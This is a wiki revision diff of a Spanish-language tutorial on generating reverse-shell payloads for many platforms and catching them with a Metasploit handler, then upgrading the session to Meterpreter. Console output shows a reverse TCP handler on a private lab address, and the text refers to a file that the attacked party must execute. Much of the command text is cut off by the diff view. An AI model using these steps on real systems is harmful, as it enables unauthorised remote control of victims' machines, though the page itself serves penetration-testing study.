reverse_shell_with_metaexploit
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
| reverse_shell_with_metaexploit [2018/06/13 21:11] – jorpilo | reverse_shell_with_metaexploit [2018/08/30 04:07] (current) – jorpilo | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| ====== Reverse shell with metaexploit ====== | ====== Reverse shell with metaexploit ====== | ||
| + | Jorge Pinilla López | ||
| + | |||
| + | 2018/06/13 | ||
| + | |||
| Vamos a crear un reverse shell y a usarlo mediante un payload, metaexploit y meterpreter | Vamos a crear un reverse shell y a usarlo mediante un payload, metaexploit y meterpreter | ||
| Line 6: | Line 10: | ||
| Opciones por defecto: | Opciones por defecto: | ||
| - | *Port 443 | + | |
| - | *MSF | + | *MSF |
| - | *REVERSE | + | *REVERSE |
| - | *STAGELESS | + | *STAGELESS |
| - | *TCP | + | *TCP |
| Ejemplo de uso: | Ejemplo de uso: | ||
| < | < | ||
| Line 39: | Line 43: | ||
| Posibles payloads a generar: | Posibles payloads a generar: | ||
| + | *APK | ||
| + | *ASP | ||
| + | *ASPX | ||
| + | *Bash [.sh] | ||
| + | *Java [.jsp] | ||
| + | *Linux [.elf] | ||
| + | *OSX [.macho] | ||
| + | *Perl [.pl] | ||
| + | *PHP | ||
| + | *Powershell [.ps1] | ||
| + | *Python [.py] | ||
| + | *Tomcat [.war] | ||
| + | *Windows [.exe /.dll] | ||
| Esto genera dos archivos: | Esto genera dos archivos: | ||
| - | *linux-shell-staged-reverse-tcp-443.elf | + | |
| Archivo que el atacado debe ejecutar | Archivo que el atacado debe ejecutar | ||
| - | *linux-shell-staged-reverse-tcp-443-elf.rc | + | |
| Payload para multi/ | Payload para multi/ | ||
| Line 131: | Line 147: | ||
| Vamos a ir un paso más y vamos a transformar dicha sesión de shell en una sesión de meterpreter, | Vamos a ir un paso más y vamos a transformar dicha sesión de shell en una sesión de meterpreter, | ||
| < | < | ||
| + | msf exploit(multi/ | ||
| + | msf post(multi/ | ||
| + | SESSION => 1 | ||
| + | msf post(multi/ | ||
| + | |||
| + | [*] Upgrading session ID: 1 | ||
| + | [*] Starting exploit/ | ||
| + | [*] Started reverse TCP handler on 192.168.200.10: | ||
| + | [*] Sending stage (853256 bytes) to 192.168.200.164 | ||
| + | [*] Meterpreter session 2 opened (192.168.200.10: | ||
| + | [*] Command stager progress: 100.00% (773/773 bytes) | ||
| + | [*] Post module execution completed | ||
| + | </ | ||
| + | |||
| + | Si ahora vamos a sessions observamos las dos sesiones, podemos acceder a la session 2 de meterpreter: | ||
| + | < | ||
| + | msf post(multi/ | ||
| + | |||
| + | Active sessions | ||
| + | =============== | ||
| + | |||
| + | Id Name Type | ||
| + | -- ---- ---- | ||
| + | 1 shell x86/ | ||
| + | 2 | ||
| + | |||
| + | msf post(multi/ | ||
| + | [*] Starting interaction with 2... | ||
| + | |||
| + | meterpreter > | ||
| + | |||
| </ | </ | ||
reverse_shell_with_metaexploit.1528924276.txt.gz · Last modified: by jorpilo
